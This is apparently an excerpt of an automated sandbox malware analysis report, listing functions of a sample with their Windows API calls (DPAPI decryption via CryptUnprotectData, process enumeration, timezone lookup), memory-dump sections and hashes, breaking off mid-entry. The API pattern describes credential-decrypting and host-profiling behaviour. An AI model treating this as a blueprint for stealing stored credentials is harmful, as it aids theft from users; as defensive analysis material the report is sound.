                      • Opcode ID: 631f077865c53c84a95d299afc5df222136f1d6655a8e7ac22cb7e8695584a02
                      • Instruction ID: 8caf9f43779a9a97a7eb2ede66784a3e42f99cde2df493f9a83766f1fc2f53a4
                      • Opcode Fuzzy Hash: 631f077865c53c84a95d299afc5df222136f1d6655a8e7ac22cb7e8695584a02
                      • Instruction Fuzzy Hash: 97210E75D00209ABDF04EFE4D9559EEBBB5FF48301F14852EE406E3250EB349608CB69
                      Function 00547240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0054724D
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00547254
                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00547281
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 005472A4
                      • LocalFree.KERNEL32(?), ref: 005472AE
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                      • String ID:
                      • API String ID: 2609814428-0
                      • Opcode ID: 52a8c0d6dba93816a99f42a2a24f588c0201451f93bb37f7d13d6ff0fb4409a4
                      • Instruction ID: 922fda3bf3f069c4099ad58701a34be53594fcc213284005cfbff367ee785725
                      • Opcode Fuzzy Hash: 52a8c0d6dba93816a99f42a2a24f588c0201451f93bb37f7d13d6ff0fb4409a4
                      • Instruction Fuzzy Hash: 81011275A84208BBEB10DFD4CD49F9E77B8FB44704F208555FB05AB2C0D7B4AA008B69
                      Function 00559600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                      Download Yara Rule
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0055961E
                      • Process32First.KERNEL32(00560ACA,00000128), ref: 00559632
                      • Process32Next.KERNEL32(00560ACA,00000128), ref: 00559647
                      • StrCmpCA.SHLWAPI(?,00000000), ref: 0055965C
                      • CloseHandle.KERNEL32(00560ACA), ref: 0055967A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                      • String ID:
                      • API String ID: 420147892-0
                      • Opcode ID: 5542765b83d447fe76b6c1ac9a591a3884f50f913d55e1684c9121ea195d30da
                      • Instruction ID: 30f10f6d7647c54cd76cc577cf2f5a09c0627176ebb3f7460e8ff16ccef10938
                      • Opcode Fuzzy Hash: 5542765b83d447fe76b6c1ac9a591a3884f50f913d55e1684c9121ea195d30da
                      • Instruction Fuzzy Hash: 56011E75A40208FBDB15DFA5DD58BEDBBF8FB48301F10819AA90697240D738AB48DF51
                      Function 00558EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                      Download Yara Rule
                      APIs
                      • CryptBinaryToStringA.CRYPT32(00000000,00545184,40000001,00000000,00000000,?,00545184), ref: 00558EC0
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: BinaryCryptString
                      • String ID:
                      • API String ID: 80407269-0
                      • Opcode ID: d75f15da5fdf7a5c3e094528c9e45fef5f6188f8f2bc24e90b69ae6d59ec6a21
                      • Instruction ID: bd0c89bd58a0195c6973b113b63cb12f4f4e7e22e05ee27225a3465efb46f777
                      • Opcode Fuzzy Hash: d75f15da5fdf7a5c3e094528c9e45fef5f6188f8f2bc24e90b69ae6d59ec6a21
                      • Instruction Fuzzy Hash: 4B110670200209BFDB00CFA4DC99FBA3BA9BF89315F109849FD1A9B250DB35E845DB64
                      Function 00557A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0102F290,00000000,?,00560E10,00000000,?,00000000,00000000), ref: 00557A63
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00557A6A
                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0102F290,00000000,?,00560E10,00000000,?,00000000,00000000,?), ref: 00557A7D
                      • wsprintfA.USER32 ref: 00557AB7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                      • String ID:
                      • API String ID: 3317088062-0
                      • Opcode ID: 2d3e5e8b4172441975bad85ba95de534a54b2a4c7a569446806640a355a4b17d
                      • Instruction ID: 745be23eac5a31053389751bde1a19abe734283e5445a4c9f54f1fc9edd83371
                      • Opcode Fuzzy Hash: 2d3e5e8b4172441975bad85ba95de534a54b2a4c7a569446806640a355a4b17d
                      • Instruction Fuzzy Hash: 4B11A1B1A45218EBEB20CF54DC59FAABB78FB04721F10479AEA0A932C0D7781E44CF51
                      Function 0091AF55 Relevance: 5.3, Strings: 3, Instructions: 1584COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: />gn$7Z;$g@my
                      • API String ID: 0-3181801268
                      • Opcode ID: ad39205665883cf52c553776a473db3e09539fb952a61e1db6386bee723d918a
                      • Instruction ID: 9b2eab824cf036b936e0755eefba7829862939c7003f4a98b42353fe2fefce55
                      • Opcode Fuzzy Hash: ad39205665883cf52c553776a473db3e09539fb952a61e1db6386bee723d918a
                      • Instruction Fuzzy Hash: 06B2E5F360C2049FE708AF29EC8577ABBE5EB94320F16493DEAC587744EA3558048797
                      Function 00553720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                      Download Yara Rule
                      APIs
                      • CoCreateInstance.COMBASE(0055E118,00000000,00000001,0055E108,00000000), ref: 00553758
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 005537B0
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ByteCharCreateInstanceMultiWide
                      • String ID:
                      • API String ID: 123533781-0
                      • Opcode ID: c172164eba52fd8577a878478c2fac5f1fd85d1f5705e82d7960921649e514f2
                      • Instruction ID: 78c3c429b52c3e1de23784cb66563492de7df45cf524d97a9f0a2aacc1bd8696
                      • Opcode Fuzzy Hash: c172164eba52fd8577a878478c2fac5f1fd85d1f5705e82d7960921649e514f2
                      • Instruction Fuzzy Hash: EC410A71A40A18AFDB24DB58CC95B9BB7B4BB48702F4081D9E608E72D0E7716E85CF50
                      Function 00549B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                      Download Yara Rule
                      APIs
                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00549B84
                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 00549BA3
                      • LocalFree.KERNEL32(?), ref: 00549BD3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Local$AllocCryptDataFreeUnprotect
                      • String ID:
                      • API String ID: 2068576380-0
                      • Opcode ID: d002779429969e89fce2df12d7d17a71782420ceae90462e98fea62150e0966c
                      • Instruction ID: 8bf8337acb44105576a3a313892c6ef78d3574eb38ac20922191c8a9521130c3
                      • Opcode Fuzzy Hash: d002779429969e89fce2df12d7d17a71782420ceae90462e98fea62150e0966c
                      • Instruction Fuzzy Hash: 7311C9B8A00209EFDB04DF94D985EAE77B5FF88304F108599E915A7350D774AE10CFA1
                      Function 00917995 Relevance: 2.9, Strings: 1, Instructions: 1633COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: !n<
                      • API String ID: 0-316657515
                      • Opcode ID: 1f51fe905ede595f128ad47dac692242eb27463f98b8b10d5f178e2e2e68951e
                      • Instruction ID: 5a80eda241ee866854b1dcf464dc95ba5be619563f5259ca7a990eca4c918e4a
                      • Opcode Fuzzy Hash: 1f51fe905ede595f128ad47dac692242eb27463f98b8b10d5f178e2e2e68951e
                      • Instruction Fuzzy Hash: 1FB217F3A0C214AFE3046E29EC8567AFBE9EF94720F16493DE6C487744EA3558018797
                      Function 009B1FF4 Relevance: 2.7, Strings: 2, Instructions: 163COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: miw$qk_w
                      • API String ID: 0-820712377
                      • Opcode ID: 70da61bfdfa7961664a31f7fd4d86149e420411c1c22f1737f417db121a9c694
                      • Instruction ID: d0d0207d64f125a7cf374cb49230ccb298692bda1648d09719fe19b2c9fb824c
                      • Opcode Fuzzy Hash: 70da61bfdfa7961664a31f7fd4d86149e420411c1c22f1737f417db121a9c694
                      • Instruction Fuzzy Hash: 2F41F2B280C214DFD3106F599E812BAB7D8EB54370F264D3DDE9997600E63A5840DBC6
                      Function 00928D9B Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: B[
                      • API String ID: 0-2151967909
                      • Opcode ID: 8f56fb069846e37ac9372cf133ad4e4f6ff9c71d4dc74b12eab6cc305ae53553
                      • Instruction ID: 12e3c843abec4719b8da93749b10190453ec9184cd76bd9f7187466fcf4bae07
                      • Opcode Fuzzy Hash: 8f56fb069846e37ac9372cf133ad4e4f6ff9c71d4dc74b12eab6cc305ae53553
                      • Instruction Fuzzy Hash: 2C5114B291E224DFD3007E18AD4527BBBE5AB50710F264C2DDAC697648EE39980497C7
                      Function 007ADFEA Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: !o~
                      • API String ID: 0-3231249185
                      • Opcode ID: 1010419807777490aff652da995edb140dda79a6970b8aac9b99cfdbef9e8874
                      • Instruction ID: 885036a4a217ed2fad50e465748c2bd71a0a656b2a292631cb5ac8c9e2242985
                      • Opcode Fuzzy Hash: 1010419807777490aff652da995edb140dda79a6970b8aac9b99cfdbef9e8874
                      • Instruction Fuzzy Hash: 9551F3F3A082145BE340AE69DC857A6B7D8DF64321F1F043EEA84D7780E679AC4587D2
                      Function 008EC2E7 Relevance: .2, Instructions: 163COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
